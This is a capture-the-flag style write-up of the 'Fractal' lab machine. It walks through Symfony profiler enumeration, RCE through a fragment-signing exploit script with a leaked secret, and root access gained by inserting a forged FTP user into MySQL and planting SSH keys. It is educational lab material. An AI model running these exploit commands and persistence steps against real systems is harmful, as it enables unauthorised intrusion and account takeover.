Post

Proving Grounds - Fractal

Fractal was an extremely useful box to learn and train my MySQL skills. It starts with identifying a Symfony CMS through HTTP enumeration.

The Symfony profiler was explored, leading to finding sensitive files and obtaining database credentials.

Using these credentials, a Symfony exploit script was executed to achieve Remote Code Execution (RCE) and gain a reverse shell.

Privilege escalation involved creating a new user via MySQL, allowing SSH access with elevated privileges, eventually leading to root access.

Diagram

graph TD
    A[Host Enumeration] -->|Nmap Scan| B[HTTP Enumeration]
    B -->|Identify Symfony| C[Explore Symfony Profiler]
    C -->|Find Sensitive Files| D[Exploit Symfony]
    D -->|Obtain Database Credentials| E[Use Symfony Exploit Script]
    E -->|RCE| F[Reverse Shell]
    F -->|Privilege Escalation| G[Create user via MySQL]
    G -->|Create User| H[SSH Access]
    H -->|User Benoit| I[Root Access]

Information Gathering

Port Scan


  • nmap -sS -Pn -n --open -p- -T4 192.168.192.233

    Untitled

  • nmap -sVC -p 21,22,80 192.168.192.233

    Untitled

Enumeration

HTTP 80


I Forced an error to appear

Accessed as if it were an admin panel.

Checking the branch on GitHub, it is possible to view documentation about upgrading Symfony 3.x, so we might find sensitive files.

Then I decided to investigate the _profiler to find directories since I tried passing it as a URL and got nothing. I filtered by all these statuses to avoid issues.

  • ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.192.233/app_dev.php/_profiler/FUZZ -fs 47400,47401,47402,47403,47404,47405,47406,47407,47408,47409,47410,47411,47412,47413,47414,47415,47416,47417,47418,47419,47420,47421,47422,47423,47424,47425,47426,47427,47428,47429,47430,47431,47432,47433,47434,47435,47436,47437,47438,47439,47440,47441,47442,47443,47444,47445,47446,47447,47448,47449,47450,47451,47452,47453,47454,47455,47456,47457,47458,47459,47460,47461,47462,47463,47464,47465,47466,47467,47468,47469,47470,47471,47472,47473,47474,47475,47476,47477,47478,47479,47480,47481,47482,47483,47484,47485,47486,47487,47488,47489,47490,47491,47492,47493,47494,47495,47496,47497,47498,47499

Found 2 directories “latest” and “open”

Untitled

Untitled

Investigating the latest had nothing…

Says the file is not readable. So, I will try to read the file found “.yml” on GitHub.

Now accessing the URL, I’ve found Database credentials.

Exploitation

Searching a lot, I found the following article https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5

Inside it, there is an exploit from a fragment. I tried to enumerate the secret but found nothing.

  • python3 secret_fragment_exploit.py http://192.168.192.233/_fragment

    Untitled

Then I decided to use the secret found in the database.

  • python3 secret_fragment_exploit.py 'http://192.168.192.233/_fragment' --method 2 --secret '48a8538e6260789558f0dfe29861c05b' --algo 'sha256' --internal-url 'http://192.168.192.233/_fragment' --function system --parameters "id"

    Untitled

Now accessing the generated URL. I was able to execute commands.

Priv Escalation

  • cat /etc/passwd → there is the user benoit

    Untitled

I previously obtained access to database information, let’s check and access it.

  • netstat -nlpt

    Untitled

I tried to access MySQL with the credentials obtained earlier but failed. Then I looked for cron, kernel version, SSH, etc., but found nothing. So I decided to look at the FTP configuration files.

  • ls -lah /etc/proftpd

    Untitled

  • cat sql.conf

    Untitled

Let’s connect to SQL.

  • mysql -u proftpd -p proftpd : protfpd_with_MYSQL_password

    Untitled

It seems to have a password for www to access proftpd. FTP authentication through ProFTPD

I will create a new password for the user benoit who already exists in the system.

In the {md5} base64-encoded format. Therefore, the right way to generate a password for the user benoit is to use the base64-encoded MD5 hash method.

  • /bin/echo "{md5}"/bin/echo -n "hendrich" | openssl dgst -binary -md5 | openssl enc -base64
  • INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}wZjbZseC3NVjPeEobwukRg==', 1000, 1000, '/', '/bin/bash', 0, NOW(), NOW());

    Untitled

Now logging into FTP

  • ftp 192.168.192.233 benoit:hendrich

    Untitled

  • ssh-keygen

    Untitled

  • cp id_rsa.pub authorized_keys
  • mkdir .ssh
  • put authorized_keys

    Untitled

  • ssh -i id_rsa benoit@192.168.192.233

    Untitled

  • sudo -l → has permission to execute everything. sudo su works

    Untitled

  • flag

    Untitled

This post is licensed under CC BY 4.0 by the author.